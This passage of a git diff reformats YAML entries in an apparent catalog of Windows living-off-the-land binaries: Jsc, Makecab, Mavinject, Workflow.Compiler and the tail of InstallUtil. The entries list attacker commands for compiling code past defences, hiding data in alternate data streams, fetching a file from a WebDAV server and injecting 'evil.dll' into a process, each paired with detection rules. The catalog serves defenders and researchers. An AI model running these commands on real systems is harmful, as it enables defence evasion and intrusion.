C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Code_Sample: -- Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Splunk: https://research.splunk.com/endpoint/4fbf9270-43da-11ec-9486-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/dcf74b22-7933-11ec-857c-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/cfa7b9ac-43f0-11ec-9b48-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/ccfeddec-43ec-11ec-b494-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/1a52c836-43ef-11ec-a36c-acde48001122/ +- Splunk: https://research.splunk.com/endpoint/28e06670-43df-11ec-a569-acde48001122/ Resources: - - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 - - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md - - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ - - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool +- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ +- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 +- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md +- Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ +- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +- Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +- Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9e2af4acf..2e88f73aa 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -1,37 +1,37 @@ ---- Name: Jsc.exe Description: Binary file used by .NET to compile javascript code to .exe or .dll format -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-05-31 Commands: - - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: jsc.exe scriptfile.js + Description: Use jsc.exe to compile javascript code stored in scriptfile.js and + output scriptfile.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: jsc.exe /t:library Library.js + Description: Use jsc.exe to compile javascript code stored in Library.js and output + Library.dll. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml - - IOC: Jsc.exe should normally not run a system unless it is used for development. +- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml +- IOC: Jsc.exe should normally not run a system unless it is used for development. Resources: - - Link: https://twitter.com/DissectMalware/status/998797808907046913 - - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ +- Link: https://twitter.com/DissectMalware/status/998797808907046913 +- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ Acknowledgement: - - Person: Malwrologist - Handle: '@DissectMalware' ---- +- Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867ee..3c6caeb28 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -1,43 +1,44 @@ ---- Name: Makecab.exe Description: Binary to package existing files into a cabinet (.cab) file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab - Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab - Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Description: Download and compresses the target file and stores it in the target file. - Usecase: Download file and compress into a cab file - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab + Description: Compresses the target file into a CAB file stored in the Alternate + Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab + Description: Compresses the target file into a CAB file stored in the Alternate + Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + Description: Download and compresses the target file and stores it in the target + file. + Usecase: Download file and compress into a cab file + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\makecab.exe - - Path: C:\Windows\SysWOW64\makecab.exe +- Path: C:\Windows\System32\makecab.exe +- Path: C:\Windows\SysWOW64\makecab.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - IOC: Makecab retrieving files from Internet - - IOC: Makecab storing data into alternate data streams +- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- IOC: Makecab retrieving files from Internet +- IOC: Makecab storing data into alternate data streams Resources: - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768a1..747a7e04b 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -1,39 +1,39 @@ ---- Name: Mavinject.exe Description: Used by App-v in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll - Description: Inject evil.dll into a process with PID 3110. - Usecase: Inject dll file into running process - Category: Execute - Privileges: User - MitreID: T1218.013 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 - Usecase: Inject dll file into running process - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll + Description: Inject evil.dll into a process with PID 3110. + Usecase: Inject dll file into running process + Category: Execute + Privileges: User + MitreID: T1218.013 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" + Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process + with PID 4172 + Usecase: Inject dll file into running process + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\mavinject.exe - - Path: C:\Windows\SysWOW64\mavinject.exe +- Path: C:\Windows\System32\mavinject.exe +- Path: C:\Windows\SysWOW64\mavinject.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml - - IOC: mavinject.exe should not run unless APP-v is in use on the workstation +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml +- IOC: mavinject.exe should not run unless APP-v is in use on the workstation +- Splunk: https://research.splunk.com/endpoint/ccf4b61b-1b26-4f2e-a089-f2009c569c57/ Resources: - - Link: https://twitter.com/gN3mes1s/status/941315826107510784 - - Link: https://twitter.com/Hexcorn/status/776122138063409152 - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://twitter.com/gN3mes1s/status/941315826107510784 +- Link: https://twitter.com/Hexcorn/status/776122138063409152 +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Giuseppe N3mes1s - Handle: '@gN3mes1s' - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Giuseppe N3mes1s + Handle: '@gN3mes1s' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f88477..0f68ac3ed 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -1,59 +1,63 @@ ---- Name: Microsoft.Workflow.Compiler.exe -Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. -Author: 'Conor Richard' +Description: A utility included with .NET that is capable of compiling and executing + C# or VB.net code. +Author: Conor Richard Created: 2018-10-22 Commands: - - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. - Usecase: Compile and run code - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. - Usecase: Compile and run code - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. - Usecase: Compile and run code - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S +- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.xml file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S +- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.txt file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S +- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.txt file. + Usecase: Compile and run code + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S Full_Path: - - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe +- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/win_workflow_compiler.yml - - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml - - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. - - IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe - - IOC: Presence of "